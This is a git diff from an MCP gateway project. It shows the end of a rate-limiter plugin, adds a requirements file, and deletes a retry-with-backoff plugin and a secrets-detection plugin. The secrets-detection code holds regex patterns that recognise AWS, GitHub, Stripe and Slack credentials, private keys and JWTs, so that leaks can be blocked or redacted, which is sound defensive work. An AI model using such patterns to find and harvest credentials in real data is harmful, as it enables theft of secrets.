result_cls( - continue_processing=False, - violation=PluginViolation( - reason="Rate limit exceeded", - description=f"Rate limit exceeded for {entity_label} '{entity}'", - code="RATE_LIMIT", - details=meta, - http_status_code=429, - http_headers=headers, - ), - ) - if headers: - return result_cls(metadata=meta, http_headers=headers) - return result_cls(metadata=meta) - - except Exception: - # Deliberate fail-open: engine errors must not block legitimate traffic. - # See module docstring "Security contract — fail-open on error". - self._failopen_error_count += 1 - logger.exception("RateLimiterPlugin.%s encountered an unexpected error; allowing request (failopen_errors=%d)", hook_name, self._failopen_error_count) - return result_cls() - - async def prompt_pre_fetch(self, payload: PromptPrehookPayload, context: PluginContext) -> PromptPrehookResult: - """Enforce rate limits before a prompt is fetched. - - Args: - payload: Prompt prehook payload containing the prompt identifier. - context: Plugin context carrying user, tenant, and request state. - - Returns: - Result allowing the request or containing a rate-limit violation. - """ - return await self._dispatch_hook(payload.prompt_id.strip().lower(), context, "prompt_pre_fetch", "prompt", PromptPrehookResult) - - async def tool_pre_invoke(self, payload: ToolPreInvokePayload, context: PluginContext) -> ToolPreInvokeResult: - """Enforce rate limits before a tool is invoked. - - Args: - payload: Tool pre-invoke payload containing the tool name. - context: Plugin context carrying user, tenant, and request state. - - Returns: - Result allowing the request or containing a rate-limit violation. - """ - return await self._dispatch_hook(payload.name.strip().lower(), context, "tool_pre_invoke", "tool", ToolPreInvokeResult) diff --git a/plugins/requirements.txt b/plugins/requirements.txt new file mode 100644 index 0000000000..660923c1f4 --- /dev/null +++ b/plugins/requirements.txt @@ -0,0 +1,16 @@ +# Runtime plugin package overrides. +# This file is NOT used during container build (see pyproject.toml [plugins] extra). +# It is used by docker-entrypoint.sh when RELOAD_PLUGIN_REQUIREMENTS_TXT=true +# to re-install or override plugin packages at container startup without rebuilding. +# +# IMPORTANT — upgrade semantics: +# The entrypoint runs `pip install -r` (without --upgrade). pip will: +# - INSTALL packages that are not already present in the venv +# - SKIP packages whose installed version already satisfies the constraint here +# To force an upgrade of a package that is already baked into the image +# (e.g. bumping cpex-rate-limiter from the version pinned in pyproject.toml), +# pin a version higher than the installed one — pip will then upgrade because +# the existing version no longer satisfies the constraint. +# +# Example (force upgrade past the baked-in version): +# cpex-rate-limiter>=0.0.4 diff --git a/plugins/retry_with_backoff/README.md b/plugins/retry_with_backoff/README.md deleted file mode 100644 index 1cfd9625b3..0000000000 --- a/plugins/retry_with_backoff/README.md +++ /dev/null @@ -1,69 +0,0 @@ -# Retry With Backoff Plugin - -> Author: Mihai Criveti -> Version: 0.1.0 - -Exponential backoff retry plugin: detects transient failures and asks the gateway to re-invoke the tool after a jittered delay. The gateway owns the sleep and the retry loop (see `tool_service.py`); this plugin owns the failure detection and delay calculation. - -## Hooks -- `tool_post_invoke` — active retry (detects failure, computes delay, requests re-invocation) -- `resource_post_fetch` — advisory only (attaches retry policy metadata; see Limitations) - -## Config -```yaml -config: - max_retries: 2 - backoff_base_ms: 200 - max_backoff_ms: 5000 - retry_on_status: [429, 500, 502, 503, 504] - jitter: true - check_text_content: false - tool_overrides: {} -``` - -## Design - -The plugin checks three failure signals in order: - -1. **`isError`** — set to `true` when the tool raises an exception. When the - gateway can determine the HTTP status code of the failure (e.g. from an - `httpx.HTTPStatusError`), it includes the code in `structuredContent`. - If a status code is present, `retry_on_status` is checked — non-transient - errors like 400 or 404 are **not** retried. Generic exceptions without a - status code (connection resets, timeouts) are always retried. -2. **`structuredContent.status_code`** — for tools on MCP spec 2025-03-26+; the gateway places a plain dict in `structuredContent`. -3. **Text content JSON parsing** — opt-in (`check_text_content: true`) for older MCP servers that return HTTP-style error dicts as serialised JSON in text content instead of raising exceptions. Disabled by default to avoid false-positives. - -Backoff uses full-jitter exponential delay: - -``` -delay = random(0, min(max_backoff_ms, backoff_base_ms × 2^attempt)) -``` - -A Rust extension (`retry_with_backoff_rust`) is used when available for signals 1 and 2, falling back to the pure-Python implementation otherwise. - -### State Management - -Per-invocation retry state is keyed by `(tool_name, request_id)` and cleaned up -on success or budget exhaustion. Entries orphaned by cancelled retries (e.g. -client disconnect during the backoff sleep) are automatically evicted after a -5-minute TTL. - -## Tool-Level Overrides - -Individual tools can override any config field: - -```yaml -config: - tool_overrides: - my_flaky_tool: - max_retries: 4 - backoff_base_ms: 500 -``` - -## Limitations - -- `max_retries` is clamped to the gateway-level `max_tool_retries` setting. -- `check_text_content` is off by default to avoid false-positives on tools that legitimately return status codes as informational data. -- Per-tool overrides are also clamped to the gateway ceiling. -- **Resource retry is not yet implemented.** The `resource_post_fetch` hook registers successfully and returns retry policy metadata, but does not trigger actual retries. Resource fetch failures raise exceptions before the post-fetch hook fires, so transient resource errors are not retried. Only `tool_post_invoke` performs active retry logic. diff --git a/plugins/retry_with_backoff/__init__.py b/plugins/retry_with_backoff/__init__.py deleted file mode 100644 index c56a0434c1..0000000000 --- a/plugins/retry_with_backoff/__init__.py +++ /dev/null @@ -1,7 +0,0 @@ -# -*- coding: utf-8 -*- -"""Location: ./plugins/retry_with_backoff/__init__.py -Copyright 2025 -SPDX-License-Identifier: Apache-2.0 - -Retry with Backoff Plugin package. -""" diff --git a/plugins/retry_with_backoff/plugin-manifest.yaml b/plugins/retry_with_backoff/plugin-manifest.yaml deleted file mode 100644 index 1aac272dce..0000000000 --- a/plugins/retry_with_backoff/plugin-manifest.yaml +++ /dev/null @@ -1,20 +0,0 @@ -description: "Exponential backoff retry plugin: detects transient failures and asks the gateway to re-invoke the tool after a jittered delay." -author: "Mihai Criveti" -version: "0.1.0" -tags: ["retry", "backoff", "resilience"] -available_hooks: - - "tool_post_invoke" - - "resource_post_fetch" -default_config: - max_retries: 2 - backoff_base_ms: 200 - max_backoff_ms: 5000 - retry_on_status: - - 429 - - 500 - - 502 - - 503 - - 504 - jitter: true - check_text_content: false - tool_overrides: {} diff --git a/plugins/retry_with_backoff/retry_with_backoff.py b/plugins/retry_with_backoff/retry_with_backoff.py deleted file mode 100644 index bc6c93d62f..0000000000 --- a/plugins/retry_with_backoff/retry_with_backoff.py +++ /dev/null @@ -1,495 +0,0 @@ -# -*- coding: utf-8 -*- -"""Location: ./plugins/retry_with_backoff/retry_with_backoff.py -Copyright 2025 -SPDX-License-Identifier: Apache-2.0 - -Retry with Backoff Plugin. - -Uses the retry_delay_ms field on PluginResult to ask the gateway to -re-execute the tool after a computed delay. The gateway owns the sleep -and the retry loop (see tool_service.py); this plugin owns the failure -detection and the delay calculation. - -Hooks: tool_post_invoke -""" - -# Future -from __future__ import annotations - -# Standard -import json -import logging -import math -import random -import time -from dataclasses import dataclass -from typing import Any, Dict - -# Third-Party -from pydantic import BaseModel, Field - -# First-Party -from mcpgateway.config import get_settings -from mcpgateway.plugins.framework import ( - Plugin, - PluginConfig, - PluginContext, - ResourcePostFetchPayload, - ResourcePostFetchResult, - ToolPostInvokePayload, - ToolPostInvokeResult, -) - -log = logging.getLogger(__name__) - - -# --------------------------------------------------------------------------- -# Optional Rust accelerator -# -# If the compiled extension is installed, a RetryStateManager instance is -# created per plugin instance (in __init__), with config baked in so the -# hot check_and_update call only passes the four dynamic args: -# tool, request_id, is_error, status_code -# -# If it's absent (e.g. dev machine without the Rust toolchain, or a -# pure-Python wheel), the plugin silently falls back to the Python -# implementation below. -# -# The try/except ImportError pattern is the standard Python idiom for -# optional compiled extensions. It imposes zero cost when Rust IS present -# (the import succeeds and _RUST_AVAILABLE is set once at module load), and -# makes the plugin fully portable when it is NOT. -# --------------------------------------------------------------------------- -try: - from retry_with_backoff_rust import RetryStateManager as _RustRetryStateManager - - _RUST_AVAILABLE = True - log.debug("retry_with_backoff: Rust extension loaded") -except ImportError: - _RustRetryStateManager = None # type: ignore[assignment,misc] - _RUST_AVAILABLE = False - log.debug("retry_with_backoff: Rust extension not available, using Python fallback") - - -# --------------------------------------------------------------------------- -# Per-tool runtime state -# --------------------------------------------------------------------------- - - -@dataclass -class _ToolRetryState: - """Mutable retry state for a single tool.""" - - consecutive_failures: int = 0 - last_failure_at: float = 0.0 - - -# Module-level dict — one entry per (tool_name, request_id). -# Each independent tool invocation gets its own fresh state; retries of the -# same invocation share state because the gateway passes the same global_context -# (and therefore the same request_id) on every retry attempt. -_STATE: Dict[str, _ToolRetryState] = {} - -# Entries older than this are considered orphaned (e.g. the retry sleep was -# cancelled by a client disconnect) and are evicted on the next _get_state call. -_STATE_TTL_SECONDS: float = 300.0 - - -def _evict_stale_entries() -> None: - """Remove state entries whose last failure is older than the TTL. - - Called from _get_state on every access. The dict is typically very small - (one entry per in-flight retry chain) so the scan is negligible. - """ - cutoff = time.monotonic() - _STATE_TTL_SECONDS - stale = [k for k, v in _STATE.items() if v.last_failure_at > 0 and v.last_failure_at < cutoff] - for k in stale: - del _STATE[k] - - -def _get_state(tool: str, request_id: str) -> _ToolRetryState: - """Return the retry state entry for a given (tool, request_id) pair, creating it if absent. - - Evicts stale entries on every call to prevent unbounded growth from - cancelled retries (e.g. client disconnects during the backoff sleep). - - Args: - tool: Tool name. - request_id: Unique request identifier. - - Returns: - The mutable retry state for this (tool, request_id) pair. - """ - _evict_stale_entries() - key = f"{tool}:{request_id}" - if key not in _STATE: - _STATE[key] = _ToolRetryState() - return _STATE[key] - - -def _del_state(tool: str, request_id: str) -> None: - """Remove the retry state entry for a given (tool, request_id) pair, if it exists. - - Args: - tool: Tool name. - request_id: Unique request identifier. - """ - _STATE.pop(f"{tool}:{request_id}", None) - - -# --------------------------------------------------------------------------- -# Configuration -# --------------------------------------------------------------------------- - - -class RetryConfig(BaseModel): - """Per-plugin configuration, read from config.yaml under the plugin's config: key.""" - - max_retries: int = Field(default=2, ge=0, description="Max consecutive retries before giving up") - backoff_base_ms: int = Field(default=200, ge=1, description="Initial backoff in milliseconds") - max_backoff_ms: int = Field(default=5000, ge=1, description="Ceiling for computed backoff in milliseconds") - retry_on_status: list[int] = Field( - default_factory=lambda: [429, 500, 502, 503, 504], - description="HTTP-style status codes in tool result that count as transient failures", - ) - jitter: bool = Field(default=True, description="Apply full-jitter to avoid thundering-herd") - check_text_content: bool = Field( - default=False, - description=( - "Parse text content as JSON and check for status_code when structuredContent is absent. " - "Enable only for tools on older MCP servers (pre-2025 spec) that return HTTP-style error " - "dicts in text content instead of raising exceptions. OFF by default because it can " - "false-positive on tools that legitimately return status codes as informational data." - ), - ) - tool_overrides: Dict[str, Dict[str, Any]] = Field( - default_factory=dict, - description="Per-tool config overrides; key = tool name, value = subset of above fields", - ) - - -def _cfg_for(cfg: RetryConfig, tool: str) -> RetryConfig: - """Return config merged with any per-tool overrides. - - Args: - cfg: Base plugin configuration. - tool: Tool name to look up overrides for. - - Returns: - Merged config if overrides exist, otherwise the original config. - """ - overrides = cfg.tool_overrides.get(tool) - if not overrides: - return cfg - merged = cfg.model_dump() - merged.update(overrides) - merged.pop("tool_overrides", None) - return RetryConfig(**merged) - - -# --------------------------------------------------------------------------- -# Backoff calculation -# --------------------------------------------------------------------------- - - -def _compute_delay_ms(attempt: int, cfg: RetryConfig) -> int: - """Return jittered exponential backoff delay in milliseconds. - - Uses full-jitter: random value between 0 and min(cap, base * 2^attempt). - This prevents thundering-herd when many tools fail at the same time. - - Args: - attempt: Zero-based retry attempt index. - cfg: Retry configuration with backoff parameters. - - Returns: - Delay in milliseconds. - """ - cap = cfg.max_backoff_ms - base = cfg.backoff_base_ms - ceiling = min(cap, base * (2**attempt)) - if cfg.jitter: - return math.ceil(random.uniform(0, ceiling)) # nosec B311 # noqa: DUO102 - timing jitter, not security - return ceiling - - -# --------------------------------------------------------------------------- -# Failure detection -# --------------------------------------------------------------------------- - - -def _is_failure(result: Any, cfg: RetryConfig) -> bool: - """Return True if the tool result should trigger a retry. - - The plugin receives result = ToolResult.model_dump(by_alias=True), which has - the shape: {"content": [...], "isError": bool, "structuredContent": {...}}. - - Three failure signals are checked, in order: - - 1. Outer ``isError`` — set to True by the gateway when the tool raises an - exception. When the gateway can determine the HTTP status code - (e.g. from ``httpx.HTTPStatusError``), it includes the code in - ``structuredContent``. If a status code is present, ``retry_on_status`` - is checked — non-transient errors (400, 401, 404 …) are skipped. - Generic exceptions without a status code are always retried. - - 2. ``structuredContent.status_code`` — when a tool returns a plain dict, the - gateway places it in structuredContent (MCP spec 2025-03-26+ only). Older - servers leave structuredContent=None and this check silently does nothing. - - 3. Text content JSON parsing (opt-in, ``check_text_content: true``) — for - tools on older MCP servers that return HTTP-style error dicts as serialized - JSON in text content instead of raising exceptions. Disabled by default - because it can false-positive on tools that legitimately return status codes - as informational data (e.g. a monitoring tool reporting downstream statuses). - - Args: - result: Serialised ToolResult dict (via model_dump with by_alias=True). - cfg: Retry configuration with retry_on_status list. - - Returns: - True if the result indicates a transient failure that should be retried. - """ - if not isinstance(result, dict): - return False - - # Signal 1: outer MCP-level isError (tool raised an exception). - # Works on all MCP spec versions. When the gateway can determine the - # HTTP status code of the failure (e.g. httpx.HTTPStatusError), it places - # the code in structuredContent so we can honour retry_on_status. - # Generic exceptions with no status code (connection errors, timeouts) - # are always considered retryable. - if result.get("isError") is True: - structured = result.get("structuredContent") - if isinstance(structured, dict): - sc = structured.get("status_code") - if isinstance(sc, int): - return sc in cfg.retry_on_status - return True - - # Signal 2: structuredContent — only populated on MCP spec 2025-03-26+. - structured = result.get("structuredContent") - if isinstance(structured, dict): - if structured.get("isError") is True: - return True - sc_status = structured.get("status_code") - if isinstance(sc_status, int) and sc_status in cfg.retry_on_status: - return True - - # Signal 3: opt-in text content parsing for older MCP servers. - # Only runs when structuredContent was absent (None) — not a double-check. - if cfg.check_text_content and structured is None: - for item in result.get("content", []): - if not isinstance(item, dict) or item.get("type") != "text": - continue - try: - parsed = json.loads(item["text"]) - except (json.JSONDecodeError, KeyError, TypeError): - continue - if not isinstance(parsed, dict): - continue - if parsed.get("isError") is True: - return True - txt_status = parsed.get("status_code") - if isinstance(txt_status, int) and txt_status in cfg.retry_on_status: - return True - - return False - - -# --------------------------------------------------------------------------- -# Plugin -# --------------------------------------------------------------------------- - - -class RetryWithBackoffPlugin(Plugin): - """Active retry-with-backoff plugin. - - On failure, returns retry_delay_ms > 0 in PluginResult to ask the - gateway to re-invoke the tool after the computed delay. - On success, resets the per-tool failure counter. - """ - - def __init__(self, config: PluginConfig) -> None: - """Initialise the plugin, clamp max_retries to the gateway ceiling, and prepare Rust state managers. - - Args: - config: Plugin configuration from the gateway plugin framework. - """ - super().__init__(config) - raw_cfg = RetryConfig(**(config.config or {})) - - # Clamp max_retries to the gateway hard ceiling - ceiling = get_settings().max_tool_retries - if raw_cfg.max_retries > ceiling: - log.warning( - "retry_with_backoff: max_retries=%d exceeds gateway ceiling=%d, clamping", - raw_cfg.max_retries, - ceiling, - ) - raw_cfg = raw_cfg.model_copy(update={"max_retries": ceiling}) - - # Clamp per-tool overrides too - for tool_name, overrides in raw_cfg.tool_overrides.items(): - if overrides.get("max_retries", 0) > ceiling: - log.warning( - "retry_with_backoff: tool_overrides[%s].max_retries=%d exceeds ceiling=%d, clamping", - tool_name, - overrides["max_retries"], - ceiling, - ) - overrides["max_retries"] = ceiling - - self._cfg = raw_cfg - - # Build Rust instances with config baked in so the hot check_and_update - # call only crosses the FFI boundary with 4 dynamic args instead of 9. - # One instance per unique config: base + one per tool override. - if _RUST_AVAILABLE: - self._rust: Any = _RustRetryStateManager( - self._cfg.max_retries, - self._cfg.backoff_base_ms, - self._cfg.max_backoff_ms, - self._cfg.jitter, - self._cfg.retry_on_status, - ) - self._rust_overrides: Dict[str, Any] = { - tool_name: _RustRetryStateManager( - overrides.get("max_retries", self._cfg.max_retries), - overrides.get("backoff_base_ms", self._cfg.backoff_base_ms), - overrides.get("max_backoff_ms", self._cfg.max_backoff_ms), - overrides.get("jitter", self._cfg.jitter), - overrides.get("retry_on_status", self._cfg.retry_on_status), - ) - for tool_name, overrides in self._cfg.tool_overrides.items() - } - else: - self._rust = None - self._rust_overrides = {} - - async def tool_post_invoke(self, payload: ToolPostInvokePayload, context: PluginContext) -> ToolPostInvokeResult: - """Detect failure and return retry_delay_ms > 0 to request a retry. - - Also attaches retry_policy metadata on every response so downstream - clients and orchestrators can observe the active policy. - - Args: - payload: Post-invoke payload containing the tool name and result. - context: Plugin execution context with request_id for state isolation. - - Returns: - Result with retry_delay_ms set and retry_policy metadata attached. - """ - tool = payload.name - cfg = _cfg_for(self._cfg, tool) - request_id = context.global_context.request_id - result = payload.result - - retry_policy_meta = { - "retry_policy": { - "max_retries": cfg.max_retries, - "backoff_base_ms": cfg.backoff_base_ms, - "max_backoff_ms": cfg.max_backoff_ms, - "retry_on_status": cfg.retry_on_status, - } - } - - # ------------------------------------------------------------------ - # Fast path: delegate to Rust when the extension is available and - # check_text_content is off (Rust handles signals 1 and 2 only). - # - # We pre-extract the two typed signals Python-side before crossing - # the FFI boundary. Passing a raw PyDict into Rust would be slower - # and require more PyO3 boilerplate. Two attribute lookups in Python - # are cheap and keep the Rust code purely typed. - # - # Config is already baked into the Rust instance — the hot call only - # passes the four dynamic args: tool, request_id, is_error, status_code. - # ------------------------------------------------------------------ - if self._rust is not None and not cfg.check_text_content: - is_error: bool = isinstance(result, dict) and result.get("isError") is True - status_code: int | None = None - if isinstance(result, dict): - structured = result.get("structuredContent") - if isinstance(structured, dict): - if structured.get("isError") is True: - is_error = True - sc = structured.get("status_code") - if isinstance(sc, int): - status_code = sc - - rust_inst = self._rust_overrides.get(tool, self._rust) - should_retry, delay_ms = rust_inst.check_and_update( - tool, - request_id, - is_error, - status_code, - ) - if should_retry: - log.debug( - "retry_with_backoff (rust): tool=%s delay_ms=%d", - tool, - delay_ms, - ) - else: - log.debug("retry_with_backoff (rust): tool=%s success/exhausted", tool) - return ToolPostInvokeResult(retry_delay_ms=delay_ms, metadata=retry_policy_meta) - - # ------------------------------------------------------------------ - # Python fallback path — used when: - # * Rust extension is not installed, OR - # * check_text_content=True (signal 3 requires Python dict parsing) - # This path is identical to the pre-Rust implementation. - # ------------------------------------------------------------------ - st = _get_state(tool, request_id) - - if _is_failure(result, cfg): - st.consecutive_failures += 1 - st.last_failure_at = time.monotonic() - - if st.consecutive_failures <= cfg.max_retries: - delay_ms = _compute_delay_ms(st.consecutive_failures - 1, cfg) - log.debug( - "retry_with_backoff: tool=%s failure=%d/%d delay_ms=%d", - tool, - st.consecutive_failures, - cfg.max_retries, - delay_ms, - ) - return ToolPostInvokeResult(retry_delay_ms=delay_ms, metadata=retry_policy_meta) - - # Max retries exhausted — give up, clean up state for this invocation. - log.warning( - "retry_with_backoff: tool=%s exhausted %d retries, returning failure", - tool, - cfg.max_retries, - ) - _del_state(tool, request_id) - return ToolPostInvokeResult(retry_delay_ms=0, metadata=retry_policy_meta) - - # Success — log recovery, clean up state for this invocation. - if st.consecutive_failures > 0: - log.debug("retry_with_backoff: tool=%s recovered after %d failure(s)", tool, st.consecutive_failures) - _del_state(tool, request_id) - return ToolPostInvokeResult(retry_delay_ms=0, metadata=retry_policy_meta) - - async def resource_post_fetch(self, payload: ResourcePostFetchPayload, context: PluginContext) -> ResourcePostFetchResult: # pylint: disable=unused-argument - """Attach retry policy metadata after resource fetch. - - Args: - payload: Resource fetch payload with URI and content. - context: Plugin execution context. - - Returns: - Result with retry_policy metadata (advisory only, no active retry). - """ - return ResourcePostFetchResult( - metadata={ - "retry_policy": { - "max_retries": self._cfg.max_retries, - "backoff_base_ms": self._cfg.backoff_base_ms, - "max_backoff_ms": self._cfg.max_backoff_ms, - "retry_on_status": self._cfg.retry_on_status, - } - } - ) diff --git a/plugins/secrets_detection/README.md b/plugins/secrets_detection/README.md deleted file mode 100644 index 688e304da7..0000000000 --- a/plugins/secrets_detection/README.md +++ /dev/null @@ -1,62 +0,0 @@ -# Secrets Detection Plugin - -Detects likely credentials and secrets in inputs and outputs using regex and simple heuristics. - -Hooks -- prompt_pre_fetch -- tool_post_invoke -- resource_post_fetch - -Configuration (example) -```yaml -- name: "SecretsDetection" - kind: "plugins.secrets_detection.secrets_detection.SecretsDetectionPlugin" - hooks: ["prompt_pre_fetch", "tool_post_invoke", "resource_post_fetch"] - mode: "enforce" - priority: 45 - config: - enabled: - aws_access_key_id: true - aws_secret_access_key: true - google_api_key: true - github_token: true - stripe_secret_key: true - generic_api_key_assignment: false # Broad heuristic; enable only if you want generic header/assignment coverage - slack_token: true - private_key_block: true - jwt_like: true - hex_secret_32: true - base64_24: false # Broad intrinsic-shape heuristic; leave opt-in unless you explicitly want aggressive blocking - redact: false # replace matches with redaction_text - redaction_text: "***REDACTED***" - block_on_detection: true - min_findings_to_block: 1 -``` - -Notes -- Emits metadata (`secrets_findings`, `count`) when not blocking; includes up to 5 example types. -- Uses conservative regexes; combine with PII filter for broader coverage. -- High-confidence, label-independent detectors include `aws_access_key_id`, `google_api_key`, `github_token`, `stripe_secret_key`, and `slack_token`. -- `generic_api_key_assignment`, `jwt_like`, `hex_secret_32`, and `base64_24` are broader heuristics and can increase false positives. -- Findings are selected on the strongest surviving match for a secret-like substring, so a longer heuristic match such as `base64_24` may still catch an assignment-style value even when `generic_api_key_assignment` stays disabled. -- When broad heuristics are enabled, the plugin logs a warning at initialization so operators know blocking behavior may become noisier. - -What it can do -- Reliably catch supported vendor formats that have strong intrinsic prefixes or structure, even when pasted without labels. -- Catch generic key/value assignments such as `X-API-Key: ...` or `api_key=...` when `generic_api_key_assignment` is enabled. -- Still catch some assignment-style values through broader intrinsic-shape heuristics when the value itself looks like a secret. -- Redact or block when matches are found. - -What it cannot do -- It cannot guarantee 100% detection for every possible secret format across every vendor without increasing false positives. -- It does not try to detect arbitrary high-entropy strings with no recognizable structure or provider prefix. -- The generic assignment heuristic intentionally favors lower false positives over maximum recall; some unlabeled vendor-specific tokens will still require adding a dedicated pattern. - -## Testing - -```bash -make benchmark # Compare Python vs Rust performance -make test # Run integration tests -``` - -Benchmark shows speedup metrics and detects active implementation (Python/Rust). Integration tests use Python by default; Rust used automatically if available. Build Rust: `cd plugins_rust/secrets_detection && maturin develop --release` diff --git a/plugins/secrets_detection/__init__.py b/plugins/secrets_detection/__init__.py deleted file mode 100644 index 4cae6971ee..0000000000 --- a/plugins/secrets_detection/__init__.py +++ /dev/null @@ -1,9 +0,0 @@ -# -*- coding: utf-8 -*- -"""Secrets Detection Plugin. - -Location: ./plugins/secrets_detection/__init__.py -Copyright 2025 -SPDX-License-Identifier: Apache-2.0 - -Secrets Detection plugin implementation. -""" diff --git a/plugins/secrets_detection/plugin-manifest.yaml b/plugins/secrets_detection/plugin-manifest.yaml deleted file mode 100644 index 6c692b726d..0000000000 --- a/plugins/secrets_detection/plugin-manifest.yaml +++ /dev/null @@ -1,22 +0,0 @@ -description: "Detects likely credentials/secrets in inputs and outputs; optional redaction and blocking." -author: "ContextForge" -version: "0.1.0" -tags: ["security", "secrets", "dlp"] -available_hooks: - - "prompt_pre_fetch" - - "tool_post_invoke" - - "resource_post_fetch" -default_config: - enabled: - aws_access_key_id: true - aws_secret_access_key: true - google_api_key: true - slack_token: true - private_key_block: true - jwt_like: true - hex_secret_32: true - base64_24: true - redact: false - redaction_text: "***REDACTED***" - block_on_detection: true - min_findings_to_block: 1 diff --git a/plugins/secrets_detection/secrets_detection.py b/plugins/secrets_detection/secrets_detection.py deleted file mode 100644 index 699dd68441..0000000000 --- a/plugins/secrets_detection/secrets_detection.py +++ /dev/null @@ -1,316 +0,0 @@ -# -*- coding: utf-8 -*- -"""Location: ./plugins/secrets_detection/secrets_detection.py -Copyright 2025 -SPDX-License-Identifier: Apache-2.0 -Authors: Mihai Criveti - -Secrets Detection Plugin. - -Detects likely credentials and secrets in inputs and outputs using regex and simple heuristics. - -Hooks: prompt_pre_fetch, tool_post_invoke, resource_post_fetch -""" - -# Future -from __future__ import annotations - -# Standard -import logging -import re -from typing import Any, Dict, Tuple - -# Third-Party -from pydantic import BaseModel, Field, field_validator - -# First-Party -from mcpgateway.plugins.framework import ( - Plugin, - PluginConfig, - PluginContext, - PluginViolation, - PromptPrehookPayload, - PromptPrehookResult, - ResourcePostFetchPayload, - ResourcePostFetchResult, - ToolPostInvokePayload, - ToolPostInvokeResult, -) - -# Initialize logging -logger = logging.getLogger(__name__) - -# Try to import Rust-accelerated implementation -try: - from secrets_detection_rust.secrets_detection_rust import py_scan_container as secrets_detection - - _RUST_AVAILABLE = True - logger.info("🦀 Rust secrets detection available - using high-performance implementation (2-8x speedup)") -except ImportError as e: - _RUST_AVAILABLE = False - secrets_detection = None # type: ignore - logger.debug(f"Rust secrets detection not available (will use Python): {e}") -except Exception as e: - _RUST_AVAILABLE = False - secrets_detection = None # type: ignore - logger.warning(f"⚠️ Unexpected error loading Rust module: {e}", exc_info=True) - -PATTERNS = { - "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"), - "aws_secret_access_key": re.compile(r"(?i)aws.{0,20}(?:secret|access).{0,20}=\s*([A-Za-z0-9/+=]{40})"), - "google_api_key": re.compile(r"\bAIza[0-9A-Za-z\-_]{35}\b"), - "github_token": re.compile(r"\b(?:gh[opusr]_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]{20,})\b"), - "stripe_secret_key": re.compile(r"\b(?:sk|rk)_(?:live|test)_[A-Za-z0-9]{16,}\b"), - "generic_api_key_assignment": re.compile(r"""(?ix) - \b(?:(?:x[-_])?api[-_]?key|apikey|api[_-]?token|access[_-]?token|bearer[_-]?token|auth[_-]?token) - \b\s*[:=]\s*['"]?[A-Za-z0-9_\-]{20,}['"]? - """), - "slack_token": re.compile(r"\bxox[abpqr]-[0-9A-Za-z\-]{10,48}\b"), - "private_key_block": re.compile(r"-----BEGIN (?:RSA|DSA|EC|OPENSSH) PRIVATE KEY-----"), - "jwt_like": re.compile(r"\beyJ[a-zA-Z0-9_\-]{10,}\.eyJ[a-zA-Z0-9_\-]{10,}\.[a-zA-Z0-9_\-]{10,}\b"), - "hex_secret_32": re.compile(r"\b[a-f0-9]{32,}\b", re.IGNORECASE), - "base64_24": re.compile(r"\b[A-Za-z0-9+/]{24,}={0,2}\b"), -} - -BROAD_PATTERNS = { - "generic_api_key_assignment", - "jwt_like", - "hex_secret_32", - "base64_24", -} - - -def _default_enabled_patterns() -> Dict[str, bool]: - """Return the default enabled-state map for all supported patterns. - - Broad heuristic patterns (listed in ``BROAD_PATTERNS``) default to - **disabled** so that a partial ``enabled:`` map in plugin YAML never - silently turns them on. - """ - enabled = {k: (k not in BROAD_PATTERNS) for k in PATTERNS.keys()} - return enabled - - -class SecretsDetectionConfig(BaseModel): - """Configuration for secrets detection. - - Attributes: - enabled: Map of pattern names to whether they are enabled. - redact: Whether to redact detected secrets. - redaction_text: Text to replace secrets with when redacting. - block_on_detection: Whether to block when secrets are detected. - min_findings_to_block: Minimum number of findings required to block. - """ - - enabled: Dict[str, bool] = Field(default_factory=_default_enabled_patterns) - redact: bool = False - redaction_text: str = "***REDACTED***" - block_on_detection: bool = True - min_findings_to_block: int = 1 - - def is_enabled(self, pattern_name: str) -> bool: - """Return whether *pattern_name* is enabled, defaulting to disabled.""" - return self.enabled.get(pattern_name, False) - - @field_validator("enabled", mode="before") - @classmethod - def _merge_enabled_patterns(cls, value: Any) -> Any: - """Merge partial enabled maps with safe defaults. - - Plugin YAML often overrides only a subset of pattern toggles. Without - merging, missing keys would implicitly fall back to `True` at scan time, - which could accidentally enable broad heuristics like - `generic_api_key_assignment`. - """ - if value is None: - return _default_enabled_patterns() - if not isinstance(value, dict): - return value - - merged = _default_enabled_patterns() - merged.update(value) - return merged - - -def _detect(text: str, cfg: SecretsDetectionConfig) -> list[dict[str, Any]]: - """Detect secrets in text using configured patterns. - - Args: - text: Text to scan for secrets. - cfg: Secrets detection configuration. - - Returns: - List of findings with type and match preview. - """ - findings: list[dict[str, Any]] = [] - for name, pat in PATTERNS.items(): - if not cfg.is_enabled(name): - continue - for m in pat.finditer(text): - findings.append({"type": name, "match": m.group(0)[:8] + "…" if len(m.group(0)) > 8 else m.group(0)}) - return findings - - -def _scan_container(container: Any, cfg: SecretsDetectionConfig, use_rust: bool = True) -> Tuple[int, Any, list[dict[str, Any]]]: - """Recursively scan container for secrets and optionally redact. - - Args: - container: Container to scan (str, dict, list, or other). - cfg: Secrets detection configuration. - use_rust: Whether to use Rust implementation if available (default: True). - - Returns: - Tuple of (count, redacted_container, all_findings). - """ - # Use Rust implementation if available and requested - if use_rust and _RUST_AVAILABLE and secrets_detection is not None: - try: - logger.debug("Using Rust implementation") - # Pass Pydantic model directly - Rust extracts attributes - return secrets_detection(container, cfg) - except Exception as e: - logger.warning("Rust scan failed, falling back to Python: %s", e, exc_info=True) - # Fall through to Python implementation - - # Python implementation - logger.debug(f"Using Python implementation (use_rust={use_rust}, _RUST_AVAILABLE={_RUST_AVAILABLE})") - total = 0 - redacted = container - all_findings: list[dict[str, Any]] = [] - if isinstance(container, str): - f = _detect(container, cfg) - total += len(f) - all_findings.extend(f) - if cfg.redact and f: - # Replace matches with redaction text (best-effort) - for name, pat in PATTERNS.items(): - if cfg.is_enabled(name): - redacted = pat.sub(cfg.redaction_text, redacted) - return total, redacted, all_findings - if isinstance(container, dict): - new = {} - for k, v in container.items(): - c, rv, f = _scan_container(v, cfg, use_rust=use_rust) - total += c - all_findings.extend(f) - new[k] = rv - return total, new, all_findings - if isinstance(container, list): - new_list = [] - for v in container: - c, rv, f = _scan_container(v, cfg, use_rust=use_rust) - total += c - all_findings.extend(f) - new_list.append(rv) - return total, new_list, all_findings - return total, container, all_findings - - -class SecretsDetectionPlugin(Plugin): - """Detect and optionally redact secrets in inputs/outputs.""" - - def __init__(self, config: PluginConfig) -> None: - """Initialize the secrets detection plugin. - - Args: - config: Plugin configuration. - """ - super().__init__(config) - self._cfg = SecretsDetectionConfig(**(config.config or {})) - 